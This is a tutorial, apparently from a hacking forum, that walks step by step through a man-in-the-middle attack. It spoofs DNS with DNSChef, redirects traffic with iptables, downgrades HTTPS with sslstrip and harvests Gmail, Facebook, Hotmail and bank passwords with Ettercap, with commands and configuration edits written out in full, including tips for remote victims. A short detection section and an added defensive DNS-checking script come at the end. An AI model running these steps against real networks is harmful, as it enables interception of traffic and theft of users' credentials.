Greetings everyone
From the title you can pretty much guess what this tutorial is all about, so let's go ahead and dive in.
First you need a tool called "Dnschef". Download it from: https://thesprawl.org/media/projects/dnschef-0.2.1.tar.gz
Of course we also need Dsniff, Ettercap and sslstrip; I suggest you use a pentest distro of your choice rather than installing sniffing/spoofing tools on your own.
root@ubuntu:~# cd dnschef-0.2.1
root@ubuntu:~/dnschef-0.2.1# ./dnschef.py
[DNSChef version 0.2 banner, iphelix@thesprawl.org]
- DNSChef started on interface: 127.0.0.1
- Using the following nameservers: 8.8.8.8
- No parameters were specified. Running in full proxy mode
Introduction
In this tutorial we carry out a MITM (Man in the Middle) attack using DNS spoofing (impersonating the DNS service) and capture SSL traffic, and with it passwords for sites like Gmail, Facebook, Hotmail and banks.
Attack
To do this you need to modify the victim's DNS settings.
First prepare the DNS service that will do the impersonation. For this we use DNSChef, which will redirect some domain name resolutions to a specific IP.
python dnschef.py --interface=192.168.1.7 --fakeip=192.168.1.7
- --interface: IP of the interface that will listen for DNS requests; this is the address that was previously configured as the DNS server on the victim's computer.
- --fakeip: IP that dnschef returns as the resolution for domains. If the victim is remote, enter the attacker's public IP address.
- --truedomains: domains that resolve to their real IP (first check that it works without this option).
Meanwhile, the network traffic we redirect continues on its normal course for the client, so the victim does not notice any malfunction in the connection.
echo 1 > /proc/sys/net/ipv4/ip_forward
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
In the case of a remote attack it is also necessary to forward ports 53 (DNS) and 80 (HTTP) on our router to the attacking machine.
To finish preparing the attacking machine, the SSL traffic (here we focus on HTTPS) must travel in clear text between the attacker and the victim and encrypted between the attacker and the legitimate server. We do this with SSLStrip and its -a option (all types of traffic).
./sslstrip.py
Now all that is left is to start capturing traffic and passwords. For this we use Ettercap, because it gives a very clear view of the captured usernames and passwords. Unfortunately we need to change Ettercap's default settings; to do this, modify the file /usr/local/etc/etter.conf. I make the following changes:
Modify the ec_uid and ec_gid settings:
[privs]
ec_uid = 0 #ec_uid = 65534 # nobody is the default
ec_gid = 0 #ec_gid = 65534 # nobody is the default
And uncomment the lines corresponding to the use of iptables:
#####################################
# redir_command_on/off
#####################################
# you must provide a valid script for your operating system in order to have
# the SSL dissection available
# note that the cleanup script is executed without enough privileges (because
# they are dropped on startup). so you have to either: provide a setuid program
# or set the ec_uid to 0, in order to be sure the cleanup script will be
# executed properly
# NOTE: this script is executed with an execve(), so you can't use pipes or
# output redirection as if you were in a shell. We suggest you to make a script if
# you need those commands.
#---------------
# Linux
#---------------
# if you use ipchains:
#redir_command_on = "ipchains -A input -i %iface -p tcp -s 0/0 -d 0/0 %port -j REDIRECT %rport"
#redir_command_off = "ipchains -D input -i %iface -p tcp -s 0/0 -d 0/0 %port -j REDIRECT %rport"
# if you use iptables:
redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
Run Ettercap so that packets are shown only in text mode (-T), quietly without headers (-q), on the eth0 interface (-i):
ettercap -T -q -i <your interface>
With any luck, in a few minutes passwords will start appearing on screen. If you need to stop the attack while it is running, it is quite convenient to redirect Ettercap's output to a file.
Detection
This type of attack can only be detected by the following methods:
HTTPS is not being used: in the URL you can see whether the https encryption protocol is in use. This is possibly the easiest way to detect the attack.
Anomalous domain-to-IP resolution: if we see that the ping command resolves a domain to the DNS server's own IP, which is not normal, or to an address within our internal network.
Changed network settings: finally, we check the DNS settings; we can detect a change of this parameter to a value that does not fit within the structure of our network.
With traceroute we would see a hop through the attacking host.
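As an added defender-side example (not code from the tutorial), the following script scores a batch of observed DNS answers against the three symptoms listed above: an unexpected resolver, a public domain resolving to a LAN address, and many domains sharing one answer, which is exactly what a single fakeip produces. The observed answers, expected resolvers and LAN range are constructed assumptions for illustration.

```python
import ipaddress
from collections import defaultdict

# Constructed sample of observed DNS answers as (domain, resolver IP, answer IP).
# These are hypothetical values for illustration, not captured data.
OBSERVED = [
    ("mail.google.com", "192.168.1.7", "192.168.1.7"),
    ("www.facebook.com", "192.168.1.7", "192.168.1.7"),
    ("login.live.com", "192.168.1.7", "192.168.1.7"),
    ("example.org", "8.8.8.8", "93.184.216.34"),
]

# Assumptions: the resolvers this network is supposed to use, and its LAN range.
EXPECTED_RESOLVERS = {"8.8.8.8", "192.168.1.1"}
LOCAL_NET = ipaddress.ip_network("192.168.1.0/24")


def analyse(observed, expected_resolvers, local_net, min_shared=3):
    """Return a list of (finding, subject, detail) tuples for suspicious answers.

    Three checks mirror the symptoms in the Detection section:
    - the answering resolver is not one of the expected servers;
    - a public domain resolves to a LAN or private address;
    - many unrelated domains resolve to the same address (one fake IP
      answering for everything).
    """
    findings = []
    domains_by_answer = defaultdict(set)
    for domain, resolver, answer in observed:
        if resolver not in expected_resolvers:
            findings.append(("unexpected-resolver", domain, resolver))
        ip = ipaddress.ip_address(answer)
        if ip in local_net or ip.is_private:
            findings.append(("public-name-to-local-ip", domain, answer))
        domains_by_answer[answer].add(domain)
    # Sorted so the output order is deterministic across runs.
    for answer, domains in sorted(domains_by_answer.items()):
        if len(domains) >= min_shared:
            findings.append(("many-names-one-ip", answer, len(domains)))
    return findings


if __name__ == "__main__":
    for finding in analyse(OBSERVED, EXPECTED_RESOLVERS, LOCAL_NET):
        print(*finding)
```

Feed it the output of a periodic "dig" run from a client and an alert on any non-empty result covers all three checks at once.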
I hope you have enjoyed the tutorial.